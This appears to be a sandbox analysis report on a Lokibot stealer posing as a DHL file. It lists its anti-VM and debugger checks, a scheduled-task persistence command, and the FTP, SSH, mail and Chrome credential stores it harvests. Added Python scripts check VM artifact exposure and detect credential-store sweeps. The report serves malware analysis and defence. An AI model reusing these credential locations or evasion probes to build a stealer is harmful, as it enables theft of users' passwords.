Source: DHL FILE 267382.exe, 00000000.00000002.234228731.00000000035E8000.00000004.00000001.sdmp | Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: DHL FILE 267382.exe, 00000000.00000002.234228731.00000000035E8000.00000004.00000001.sdmp | Binary or memory string: VMware SVGA II
Source: DHL FILE 267382.exe, 00000000.00000002.234228731.00000000035E8000.00000004.00000001.sdmp | Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: DHL FILE 267382.exe, 00000000.00000002.234228731.00000000035E8000.00000004.00000001.sdmp | Binary or memory string: l"SOFTWARE\VMware, Inc.\VMware Tools
Source: C:\Users\user\Desktop\DHL FILE 267382.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\DHL FILE 267382.exe | Code function: 3_2_0040317B mov eax, dword ptr fs:[00000030h]
(fs:[30h] is the PEB pointer of a 32-bit process; loading it is the usual prelude to testing PEB.BeingDebugged.)
Source: C:\Users\user\Desktop\DHL FILE 267382.exe | Code function: 3_2_00402B7C GetProcessHeap,RtlAllocateHeap,
Source: C:\Users\user\Desktop\DHL FILE 267382.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\DHL FILE 267382.exe | Memory allocated: page read and write | page guard
Source: C:\Users\user\Desktop\DHL FILE 267382.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\wmiRSwSoPk' /XML 'C:\Users\user\AppData\Local\Temp\tmp4DA9.tmp'
Source: C:\Users\user\Desktop\DHL FILE 267382.exe | Process created: C:\Users\user\Desktop\DHL FILE 267382.exe {path}
(The self-spawned child is where the unpacked Lokibot payload is later found, at image base 0x400000 of process 3; the outer executable is a loader that injects the native stealer into a second instance of itself.)
Source: C:\Users\user\Desktop\DHL FILE 267382.exe | Queries volume information: C:\Users\user\Desktop\DHL FILE 267382.exe VolumeInformation
Source: C:\Users\user\Desktop\DHL FILE 267382.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\DHL FILE 267382.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\DHL FILE 267382.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\DHL FILE 267382.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
(The GAC assemblies being resolved, Microsoft.VisualBasic among them, indicate that the outer loader is a .NET executable; the injected payload is native code.)
Source: C:\Users\user\Desktop\DHL FILE 267382.exe | Code function: 3_2_00406069 GetUserNameW,
Source: C:\Users\user\Desktop\DHL FILE 267382.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
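The registry paths in the memory strings above are the places a stock VMware guest gives itself away, so the practical question for anyone running this sample is whether their analysis VM exposes them. The script below is an added example, not code from the report or the sample: it reads each probed location through a pluggable reader and returns the ones that would satisfy an anti-VM check. FAKE_VMWARE_GUEST is a constructed in-memory registry standing in for a VMware guest so the logic runs anywhere; winreg_reader() is the live reader for a Windows host. Apart from InstallPath, which the report shows, the value names are the usual ones for those keys and are assumptions, as are the sample values.

```python
"""Exposure check for the VMware artifacts the sample probes.

Added example, not the report's or the sample's code. The memory strings above name registry
locations that give a VMware guest away; assess() reads each through a pluggable reader and
returns the ones that match. FAKE_VMWARE_GUEST is a constructed in-memory registry standing in
for a stock VMware guest so the logic runs anywhere; winreg_reader() is the live reader for a
Windows host. Value names other than InstallPath (which the report shows) are the usual ones
for those keys and are assumptions, as are the sample values.
"""
import sys

DISPLAY_ADAPTER_0 = r"SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000"

# (hive, key, value name, case-insensitive substring that betrays the hypervisor)
PROBES = [
    ("HKLM", r"SOFTWARE\VMware, Inc.\VMware Tools", "InstallPath", "vmware"),
    ("HKLM", r"HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0", "Identifier", "vmware"),
    ("HKLM", r"HARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0", "Identifier", "vmware"),
    ("HKLM", r"SYSTEM\ControlSet001\Services\Disk\Enum", "0", "vmware"),
    ("HKLM", DISPLAY_ADAPTER_0, "DriverDesc", "vmware svga"),
]

# Constructed registry contents resembling a stock VMware guest (values are illustrative).
FAKE_VMWARE_GUEST = {
    ("HKLM", PROBES[0][1], "InstallPath"): "C:\\Program Files\\VMware\\VMware Tools\\",
    ("HKLM", PROBES[1][1], "Identifier"): "VMware, VMware Virtual S SCSI Disk Device",
    ("HKLM", PROBES[3][1], "0"): "SCSI\\Disk&Ven_VMware&Prod_Virtual_disk\\5&1ec51bf7&0&000000",
    ("HKLM", DISPLAY_ADAPTER_0, "DriverDesc"): "VMware SVGA II",
}


def dict_reader(table: dict):
    """Reader over an in-memory registry: returns the value string or None."""
    return lambda hive, key, value: table.get((hive, key, value))


def winreg_reader(hive: str, key: str, value: str):
    """Live reader for Windows hosts. KEY_WOW64_64KEY reads the native 64-bit view; drop it to
    see the WOW6432Node-redirected view that a 32-bit process such as this sample gets for
    HKLM\\SOFTWARE (HARDWARE and SYSTEM are not redirected)."""
    import winreg
    root = {"HKLM": winreg.HKEY_LOCAL_MACHINE, "HKCU": winreg.HKEY_CURRENT_USER}[hive]
    try:
        with winreg.OpenKey(root, key, 0, winreg.KEY_READ | winreg.KEY_WOW64_64KEY) as k:
            data, _ = winreg.QueryValueEx(k, value)
            return str(data)
    except OSError:
        return None


def assess(reader) -> list:
    """(key, value name, data) for every probe whose data contains the tell-tale substring."""
    hits = []
    for hive, key, value, needle in PROBES:
        data = reader(hive, key, value)
        if data is not None and needle in data.lower():
            hits.append((key, value, data))
    return hits


if __name__ == "__main__":
    reader = winreg_reader if sys.platform == "win32" else dict_reader(FAKE_VMWARE_GUEST)
    hits = assess(reader)
    for key, value, data in hits:
        print(f"EXPOSED  HKLM\\{key} [{value}] = {data}")
    print(f"{len(hits)} of {len(PROBES)} probes would identify this host as a VMware guest")
```

Every hit is an artifact to remove or patch before the next detonation; the SbieDll.dll and WINE_GET_UNIX_FILE_NAME strings in the same dump are module and export probes rather than registry reads and need a separate check. Because the sample is 32-bit, run the live reader both with and without KEY_WOW64_64KEY: the VMware Tools key may be visible in one registry view and absent in the other, which changes what the malware itself sees.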

Stealing of Sensitive Information:

Yara detected Lokibot
Source: Yara match | File source: 00000000.00000002.234483040.00000000044EF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.243441085.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.233783014.0000000003321000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: DHL FILE 267382.exe PID: 6600, type: MEMORY
Source: Yara match | File source: Process Memory Space: DHL FILE 267382.exe PID: 6708, type: MEMORY
Source: Yara match | File source: 3.2.DHL FILE 267382.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.DHL FILE 267382.exe.400000.0.raw.unpack, type: UNPACKEDPE
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\user\Desktop\DHL FILE 267382.exe | Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
Source: C:\Users\user\Desktop\DHL FILE 267382.exe | Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl
(9bis.com\KiTTY is the KiTTY fork of PuTTY; Software\Martin Prikryl is the vendor key under which WinSCP keeps its saved sessions.)
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\DHL FILE 267382.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
(Login Data is Chrome's SQLite password store; the stored passwords are protected with DPAPI under the logged-on user's credentials, which a stealer running as that user can decrypt.)
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\Desktop\DHL FILE 267382.exe | Key opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
Source: C:\Users\user\Desktop\DHL FILE 267382.exe | Key opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
Source: C:\Users\user\Desktop\DHL FILE 267382.exe | Key opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
Source: C:\Users\user\Desktop\DHL FILE 267382.exe | Key opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
Tries to steal Mail credentials (via file access)
Source: C:\Users\user\Desktop\DHL FILE 267382.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\Desktop\DHL FILE 267382.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Tries to steal Mail credentials (via file registry)
Source: C:\Users\user\Desktop\DHL FILE 267382.exe | Code function: PopPassword
Source: C:\Users\user\Desktop\DHL FILE 267382.exe | Code function: SmtpPassword
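Each key and file in the evidence above belongs to a different application, and no single legitimate program opens KiTTY sessions, WinSCP settings, Far FTP hosts, mail profiles and Chrome's Login Data within seconds of one another; the distinguishing signal is the sweep, not any one access. The rule below is an added example, not code from the report or from Lokibot: it counts distinct credential stores touched per process inside a sliding window and alerts once the count reaches a threshold. The store markers are taken from the evidence lines; the event tuples are constructed stand-ins for registry and file access telemetry (timestamps, PIDs and the benign events are made up), and THRESHOLD and WINDOW_SECONDS are assumptions.

```python
"""Sweep detection for the credential stores Lokibot enumerates.

Added example, not part of the report. Each key or file above belongs to a different
application, and no single legitimate program opens KiTTY sessions, WinSCP settings, Far FTP
hosts, mail profiles and Chrome's Login Data within seconds of one another. The rule therefore
counts distinct credential stores touched per process inside a sliding window and alerts once
the count reaches THRESHOLD. The store markers come from the report's evidence lines; the
events are constructed stand-ins for registry/file access telemetry (timestamps, PIDs and the
benign events are made up); THRESHOLD and WINDOW_SECONDS are assumptions.
"""
from collections import defaultdict

CRED_STORES = {  # store name -> lower-case path marker
    "kitty": r"software\9bis.com\kitty\sessions",
    "winscp": r"software\martin prikryl",
    "far_ftp": r"software\far\plugins\ftp\hosts",
    "far2_ftp": r"software\far2\plugins\ftp\hosts",
    "classicftp": r"software\nch software\classicftp\ftpaccounts",
    "blazeftp": r"software\flashpeak\blazeftp\settings",
    "incredimail": r"software\incredimail\identities",
    "outlook": r"windows messaging subsystem\profiles\outlook",
    "chrome": r"\google\chrome\user data\default\login data",
}
THRESHOLD = 3          # distinct stores per process before alerting (assumption)
WINDOW_SECONDS = 30.0  # sliding window (assumption)

SAMPLE = r"C:\Users\user\Desktop\DHL FILE 267382.exe"
SAMPLE_EVENTS = [  # constructed: (timestamp seconds, pid, image, registry key or file path)
    (100.0, 6708, SAMPLE, r"HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions"),
    (100.2, 6708, SAMPLE, r"HKEY_CURRENT_USER\Software\Martin Prikryl"),
    (100.4, 6708, SAMPLE, r"HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts"),
    (100.5, 6708, SAMPLE, r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    (200.0, 4120, r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    (300.0, 5000, r"C:\Program Files (x86)\WinSCP\WinSCP.exe",
     r"HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions"),
]


def classify(target: str):
    """Name of the credential store a path belongs to, or None."""
    t = target.lower()
    return next((name for name, marker in CRED_STORES.items() if marker in t), None)


def detect_sweeps(events, threshold=THRESHOLD, window=WINDOW_SECONDS) -> list:
    """One alert per process that touches `threshold` distinct stores within `window` seconds."""
    touched = defaultdict(list)   # pid -> [(timestamp, store)]
    alerts, alerted = [], set()
    for ts, pid, image, target in sorted(events):
        store = classify(target)
        if store is None:
            continue
        touched[pid].append((ts, store))
        recent = {s for t, s in touched[pid] if ts - t <= window}
        if len(recent) >= threshold and pid not in alerted:
            alerted.add(pid)
            alerts.append({"pid": pid, "image": image, "stores": sorted(recent), "at": ts})
    return alerts


if __name__ == "__main__":
    for a in detect_sweeps(SAMPLE_EVENTS):
        print(f"ALERT pid={a['pid']} {a['image']} touched {a['stores']} by t={a['at']}")
```

Chrome opening its own Login Data and WinSCP reading its own sessions key each count as one store and never alert, while the sample crosses the threshold on its third store. Counting per process rather than matching on image path matters here because the stealer runs inside a second instance of the same DHL-named executable, so the image alone looks no different from the loader that dropped it.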

Mitre Att&ck Matrix

The matrix is reproduced per tactic (one column of the original). A number in parentheses is the superscript the report attaches to a technique it matched; entries without a number are the unmatched placeholder cells of the matrix. Network Effects and Remote Service Effects are Mobile ATT&CK tactics and carry no matches for this Windows sample.

Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise
Execution: Command and Scripting Interpreter (2), Scheduled Task/Job (1), At (Linux), At (Windows), Cron, Launchd, Scheduled Task, Command and Scripting Interpreter
Persistence: Scheduled Task/Job (1), Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac), Network Logon Script, Rc.common, Startup Items, Scheduled Task/Job
Privilege Escalation: Access Token Manipulation (1), Process Injection (11), Scheduled Task/Job (1), Logon Script (Mac), Network Logon Script, Rc.common, Startup Items, Scheduled Task/Job
Defense Evasion: Masquerading (1), Virtualization/Sandbox Evasion (4), Disable or Modify Tools (1), Access Token Manipulation (1), Process Injection (11), Deobfuscate/Decode Files or Information (1), Obfuscated Files or Information (3), Software Packing (2)
Credential Access: OS Credential Dumping (2), Credentials in Registry (2), Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem
Discovery: Security Software Discovery (231), Virtualization/Sandbox Evasion (4), Account Discovery (1), System Owner/User Discovery (1), File and Directory Discovery (2), System Information Discovery (13), Network Sniffing, Network Service Scanning
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Shared Webroot
Collection: Email Collection (1), Archive Collected Data (1), Data from Local System (2), Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol, Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Command and Control: Encrypted Channel (1), Ingress Tool Transfer (3), Non-Application Layer Protocol (2), Application Layer Protocol (12), Fallback Channels, Multiband Communication, Commonly Used Port, Application Layer Protocol
Network Effects: Eavesdrop on Insecure Network Communication, Exploit SS7 to Redirect Phone Calls/SMS, Exploit SS7 to Track Device Location, SIM Card Swap, Manipulate Device Communication, Jamming or Denial of Service, Rogue Wi-Fi Access Points, Downgrade to Insecure Protocols
Remote Service Effects: Remotely Track Device Without Authorization, Remotely Wipe Data Without Authorization, Obtain Device Cloud Backups
Impact: Modify System Partition, Device Lockout, Delete Device Data, Carrier Billing Fraud, Manipulate App Store Rankings or Ratings, Abuse Accessibility Features, Data Encrypted for Impact, Generate Fraudulent Advertising Revenue

Behavior Graph

Behavior Graph ID: 299736 (interactive process and signature graph; not reproduced in this text extract)